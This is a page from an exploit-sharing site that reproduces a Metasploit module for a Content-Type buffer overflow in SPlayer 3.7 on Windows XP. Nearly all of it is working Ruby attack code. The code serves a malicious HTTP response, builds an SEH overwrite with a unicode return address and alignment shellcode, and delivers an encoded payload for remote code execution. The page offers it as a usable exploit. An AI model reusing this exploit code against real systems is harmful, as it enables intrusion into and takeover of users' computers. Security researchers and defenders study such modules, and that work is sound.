[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SPlayer 3.7 Content-Type Buffer Overflow

Author
metasploit
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16083
Category
remote exploits
Date add
11-05-2011
Platform
windows
##
# $Id: splayer_content_type.rb 12581 2011-05-11 00:18:11Z sinn3r $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking
 
    include Msf::Exploit::Remote::HttpServer::HTML
 
    def initialize(info={})
        super(update_info(info,
            'Name'           => "SPlayer 3.7 Content-Type Buffer Overflow",
            'Description'    => %q{
                    This module exploits a vulnerability in SPlayer v3.7 or piror.  When SPlayer
                requests the URL of a media file (video or audio), it is possible to gain arbitrary
                remote code execution due to a buffer overflow caused by an exceeding length of data
                as the 'Content-Type' parameter.
            },
            'License'        => MSF_LICENSE,
            'Version'        => "$Revision: 12581 $",
            'Author'         =>
                [
                    'xsploitedsec <xsploitedsecurity[at]gmail.com>',  #Initial discovery, PoC
                    'sinn3r', #Metasploit
                ],
            'References'     =>
                [
                    ['URL', 'http://www.exploit-db.com/exploits/17243/'],
                ],
            'Payload'        =>
                {
                    'BadChars'        => "\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f",
                    'StackAdjustment' => -3500,
                    'EncoderType'     => Msf::Encoder::Type::AlphanumMixed,
                    'BufferRegister'  => 'ECX',
                },
            'DefaultOptions'  =>
                {
                    'ExitFunction'         => "seh",
                    'InitialAutoRunScript' => 'migrate -f',
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [
                        'Windows XP SP2/XP3',
                        {
                            'Offset' => 2073,    #Offset to SEH
                            'Ret'    => 0x7325,  #Unicode P/P/R (splayer.exe)
                            'Max'    => 30000,   #Max buffer size
                        }
                    ],
                ],
            'Privileged'     => false,
            'DisclosureDate' => "May 4 2011",
            'DefaultTarget'  => 0))
    end
 
    def get_unicode_payload(p)
        encoder = framework.encoders.create("x86/unicode_mixed")
        encoder.datastore.import_options_from_hash( {'BufferRegister'=>'EAX'} )
        unicode_payload = encoder.encode(p, nil, nil, platform)
        return unicode_payload
    end
 
    def on_request_uri(cli, request)
 
        agent = request.headers['User-Agent']
        if agent !~ /Media Player Classic/
            send_not_found(cli)
            print_error("#{cli.peerhost}:#{cli.peerport} Unknown user-agent")
            return
        end
 
        nop = "\x73"
 
        #MOV EAX,EDI; XOR AL,C3; INC EAX; XOR AL,79; PUSH EAX; POP ECX; JMP SHORT 0x40
        alignment = "\x8b\xc7\x34\xc3\x40\x34\x79\x50\x59\xeb\x40"
        padding = nop*6
        p = get_unicode_payload(alignment + padding + payload.encoded)
 
        sploit = rand_text_alpha(2073)
        sploit << "\x61\x73"
        sploit << "\x25\x73"
        sploit << nop
        sploit << "\x55"
        sploit << nop
        sploit << "\x58"
        sploit << nop
        sploit << "\x05\x19\x11"
        sploit << nop
        sploit << "\x2d\x11\x11"
        sploit << nop
        sploit << "\x50"
        sploit << nop
        sploit << "\x50"
        sploit << nop
        sploit << "\x5f"
        sploit << nop
        sploit << "\xc3"
        sploit << rand_text_alpha(1000)
        sploit << p
        sploit << rand_text_alpha(target['Max']-sploit.length)
 
        print_status("Sending malicious content-type to #{cli.peerhost}:#{cli.peerport}...")
        send_response(cli, '', {'Content-Type'=>sploit})
 
    end
 
end



#  0day.today [2024-12-25]  #